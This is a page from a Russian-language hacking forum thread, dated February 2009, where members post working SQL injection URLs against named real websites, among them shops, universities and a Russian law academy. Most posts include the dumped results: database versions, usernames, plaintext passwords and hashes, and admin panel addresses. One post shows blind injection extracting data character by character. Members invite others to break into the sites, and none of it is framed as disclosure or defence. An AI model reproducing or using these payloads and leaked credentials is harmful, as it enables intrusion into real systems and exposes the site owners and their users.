ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7631  
Старый 03.02.2009, 18:22
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.kstore.ro/index.php?opt=showall&grup=-8+union+select+1,concat_ws(0x3a,version(),database (),user()),3--


Database Version: 5.0.67-community
Database name: kstorer_kstore
User name: kstorer_kstore@localhost


http://www.kstore.ro/index.php?opt=showall&grup=-8+union+select+1,concat_ws(0x3a,username,password) ,3+from+admins--

ralumihai:bdb8c008fa551ba75f8481963f2201da: tutu
админка
http://www.kstore.ro/admin/
 
Ответить с цитированием

  #7632  
Старый 04.02.2009, 00:10
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.aui.edu/pr.php?id=-20071110%27+union+select+1,2,3,4,5,convert(version()+using+latin1),7,8,9,10,11,12,13,14/*
4.1.18-standard-log

PR: 7

\\ээм, у меня поиск не работет
 
Ответить с цитированием

  #7633  
Старый 04.02.2009, 00:23
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.comunitati.net/no_login/index.php?modul=comunitati&categ=orase&id_tara=-6+union+select+1,concat_ws(0x3a,version(),database (),user()),3/*


Version: 4.0.27-max-log
Database: paulstaicu
User: paulstaicu@68.178.254.5
 
Ответить с цитированием

  #7634  
Старый 04.02.2009, 04:59
Аватар для hackmen
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

PR6

http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,concat(pw,0x3a,userna me),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32+from+user_logins+wher e+ID=1--

Если кто найдет админку куда подйдет логин и пасс- дайте знать, плиз. =)
+
UPD

http://www2.ric.edu/news/displayNews.php?id=news-99999+union+select+concat(Username,0x3a,Password), 2,3,4,5,6+from+int_users--

cberube:rainbow

http://www2.ric.edu/admin/

Последний раз редактировалось hackmen; 04.02.2009 в 05:38..
 
Ответить с цитированием

  #7635  
Старый 04.02.2009, 07:01
Аватар для AkyHa_MaTaTa
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от hackmen  
PR6

http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,concat(pw,0x3a,userna me),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32+from+user_logins+wher e+ID=1--

Если кто найдет админку куда подйдет логин и пасс- дайте знать, плиз. =)
По всей видимости пассы от галлереи, но она снесена, robots.txt тебе в руки.
Не совсем то, но
Код HTML:
http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,group_concat(concat_ws(0x3A,option_name,option_value)+SEPARATOR+0x3c62723e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+blogs.wp_president_options--
http://www.gatech.edu/blogs/president - wp(6.3)
www.gatech.edu PageRank: 8 тИЦ: 850

вот юзеры
Код HTML:
http://www.coa.gatech.edu/id/event.php?id=-3736+union+select++1,2,3,4,5,group_concat(concat(user_pass,0x3A,user_login,0x3c62723e)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+blogs.wp_president_users--
$P$BTtoA2y6jOaVJGW3ImqzvO7tpPsqwg1:admin
$P$BWlRTtFjpvji9sdoeZwxi/OG9a9iUe.:bryan
$P$BKkhNwEyoo5vKYR54gIbnV9qFkMe4v0:michael
хотя учитывая что в wp новых версий ну очень трудно побрутить хеш то это безсмыслено.
 
Ответить с цитированием

  #7636  
Старый 04.02.2009, 10:44
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.star-storage.ro/produse_detalii.asp?ID=11[SQL]

Version: 5.0.51a-community-nt
DataBase: star-storage
User: star-storage@localhost



Впервые встретил такую связку ASP+MySQL, гибрид.Поля выводимые не нашел, вывел все брутом, есть таблица users с колонками: UserName, password, user, parola.

админка
www.star-storage.ro/admin
юзеров не брутил..времени и желания нет, кто хочет поковырятся ...вперёд. Удачи.


З.Ы. Jokester извини за бояны.. моя ошибка
 
Ответить с цитированием

  #7637  
Старый 04.02.2009, 15:51
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.grothcorp.com/product.php?ID=9691379876+union+select+1,2,3,4,5,6 ,7,8,9,concat_ws(0x3a,version(),user(),database()) ,11,12,13,14,15,16,17,18,19,20,21,22,23,24--&category=7&series=153
Database Version:4.0.18
User name:groth@localhost
Database name:groth


Цитата:
http://www.bragada.com/product.php?&id=138098097656+union+select+concat_w s(0x3a,version(),user(),database()),2,3,4,5,6,7,8, 9--&fid=1
Database Version:4.1.22-standard
User name:bragada_ebed@localhost
Database name:bragada_ebed


Цитата:
http://www.thejazzcorner.com/cd-profile.php?ID=13687687545+union+select+1,2,concat _ws(0x3a,version(),user(),database()),4,5,6,7,8,9, 10--
Database Version:4.1.22-log
User name:ceke9mzd9e@localhost
Database name:live_jazz



Цитата:
http://www.ourvarsity.com/school-article-profile.php?School_ID=0&Article_ID=18176875587+uni on+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version (),user(),database()),11,12,13,14,15--

Database Version: 5.0.67-log
Database name: varsity_data
User name: varsity_user@localhost
 
Ответить с цитированием

  #7638  
Старый 04.02.2009, 16:06
Аватар для BloodyMessage
BloodyMessage
Участник форума
Регистрация: 20.08.2006
Сообщений: 199
Провел на форуме:
1074298

Репутация: 131
Отправить сообщение для BloodyMessage с помощью ICQ
По умолчанию

RP5

Цитата:
http://www.mmsa.org/events/detail.php?id=-1+union+select+1,concat(username,0x3a,password),3, 4,5,6,Database(),8,9,0,1,12,3,4,5,6,7,8,9,0,1,22,3 ,4,5,6,7,8,9,0,1,32,3,4,5,6,7,8,9,0,41+from+user+l imit+0,1--
turner:fooBar
mmsa:slazNEL

4.1.22-standard
mmsa_mmsa@localhost
mmsa_mmsa

********************************************

PR4

Цитата:
http://www.veeteedinein.co.uk/recipe_more.php?id=-1+union+select+1,concat(username,0x3a,password),3, 4,5+from+tbl_user--
Database Version: 5.0.45
Database name: veeteecom
User name: veeteecom@localhost

Админка:
http://www.veeteedinein.co.uk/admin/
admin1:u#ddaa!212@mmcom

Последний раз редактировалось BloodyMessage; 04.02.2009 в 16:42..
 
Ответить с цитированием

  #7639  
Старый 04.02.2009, 21:18
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://sports.yourspace.nuigalway.ie/clubs/club_profile.php?id=-102+union+select+user()--
Dbname: sports
Version: 5.0.51a-3ubuntu5.4-log
Username: sports@localhost
около 57 таблиц.

Последний раз редактировалось $n@ke; 04.02.2009 в 21:25..
 
Ответить с цитированием

  #7640  
Старый 04.02.2009, 21:46
Аватар для pinky07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию

http://www.rfrap.ru Сайт Ростовского филиала Российской академии правосудия=)

юзер:
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),1,1)))=114 r
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),2,1)))=102 f
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),3,1)))=114 r
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),4,1)))=97 a
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),5,1)))=112 p
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),6,1)))=64 @
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),7,1)))=108 l
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),8,1)))=111 o
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),9,1)))=99 c
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),10,1)))=97 a
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),11,1)))=108 l
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),12,1)))=104 h
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),13,1)))=111 o
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),14,1)))=115 s
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),15,1)))=116 t
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(use r(),16,1)))=0

бд
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(dat abase(),1,1)))=114 r
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(dat abase(),2,1)))=102 f
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(dat abase(),3,1)))=114 r
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(dat abase(),4,1)))=97 a
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(dat abase(),5,1)))=112 p
http://www.rfrap.ru/site/index.php?newsfull=3+AND+ascii(lower(substring(dat abase(),6,1)))=0

версия mysql
http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),1,1)= 3 3
http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),2,1)= 0 0
http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),3,1)= 2 2
http://www.rfrap.ru/site/index.php?newsfull=3+and+substring(version(),4,1)= 3 3

P.S. Простите, что так много=)
P.P.S. Уффф=)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ